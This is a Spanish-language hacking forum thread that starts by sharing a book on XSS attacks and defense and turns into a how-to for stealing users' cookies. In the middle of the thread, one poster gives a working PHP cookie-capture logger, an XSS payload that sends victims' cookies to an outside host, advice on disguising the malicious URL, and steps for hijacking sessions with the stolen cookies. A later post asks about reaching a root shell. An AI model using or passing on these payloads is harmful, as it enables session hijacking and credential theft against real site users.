Syngress: Cross Site Scripting Attacks XSS, Exploits and Defense

[Sknight]

Vengador de las sombras ya posteo un pdf sobre esta técnica: Cross Site Scripting.

Sin embargo aquí les dejo un pdf perteneciente a
Para ver este enlace Registrate o Inicia Sesion

Syngress

. Está subido a mi cuenta de mediafire, con lo cual el link no caducará. Sin nada más que hablar:

Idioma: Inglés

Páginas: 482

Descarga:
Para ver este enlace Registrate o Inicia Sesion

XSS Attacks, Exploits and Defense.pdf

[vengador de las sombras]

Por fin comienzan a volver los grandes aportes!!.

Descargando... Sigue así .

[Iritsi]

¿Qué es este ataque?¿En que se basan los ataque XSS?

Lo siento soy nuevo.

[vengador de las sombras]

Ehm... Igual si te lees el manual lo comprendes ¬¬''


Se trata de una vulnerabilidad en la cual un atacante puede inyectar código, el cual será interpretado como si fuese código legítimo de la web.

Eso es a muy grandes rasgos de lo que se trata... Leete el manual y si tienes alguna duda, posteala.

[Iritsi]

Si inyectas codigos html a traves de una alerta script, pero si yo en ese caso no quisiera inyectar un codigo html sino una link externo o incluso robo credencial de coockies, por ejemplo en un XSS en un formulario de registro d eloging inyectar la coockie de uno de los user registrados podria hacerlo, osea robo de credenciales, o àra hacer esto depende de las tres clases del ataque XSS, tendria que ser -0  para ejecutar código remotamente con los permisos de otro usuario, si e leido el mnaual pero esta en ingles y es bastante dificil de leer.

un saludo

[Sknight]

-0 ... de donde has salido tu... En fin a responder se ha dicho.

Según lo que veo  tu quieres hacer un cookie poisoning.

Queremos falsificar las cookies de los usuarios registrados, así que evidentemente tendremos que capturarlas no?

Para ello hacemos un capturador de cookies y lo subimos a un host con privilegios 777.


Para ver este enlace Registrate o Inicia Sesion

Código por _mÙëK§™_

Código:

<?php
$archivo = fopen('coockieslog.htm','a');//Aquí puedes cambiar el nombre del archivo
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '
 Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

Ahora el código que llenará nuestro capturador :P

Código:

http://www.loginvulnerable/login.php?nombre del textbox=<script>window.location='http://explicacion.com/coockieslog.php?cookie='+document.cookie;</script>&varia depende del nombre del botón=;

Y ahora solo queda esperar. Para disimular la url te recomiendo usar esto:
Para ver este enlace Registrate o Inicia Sesion

http://meyerweb.com/eric/tools/dencoder/

Después solo queda usar el cookie editor para modificar tu cookie por alguna de las capturadas

Cookie Editor:
Para ver este enlace Registrate o Inicia Sesion

https://addons.mozilla.org/es-ES/firefox/addon/573

[Iritsi]

Asi es perfecto!;) Y si quiero inyecctar a traves de un XXS osea un script de alerta en este caso un link externo para que sea ejecutado sobre ese nivel -0, ya que e sel unico que ejecuta comandos en e servidor a parte de el navegador ¿Como sería? En el link esterno nos encontramos con una shell root!;)

saludos

[kamui23]

Olé tus narices: te has leído el manual y has preguntado una duda razonable. Esta forma de preguntar habria que enmarcarla. .

Edit de N.O.X. : Mis felicidades para ti iristi, hacía tiempo que no respondía con tanto gusto a un tema... esta es una de las mejores formas de subir el nivel de una sección, preguntando dudas razonables. (@contestando tu segunda pregunta...)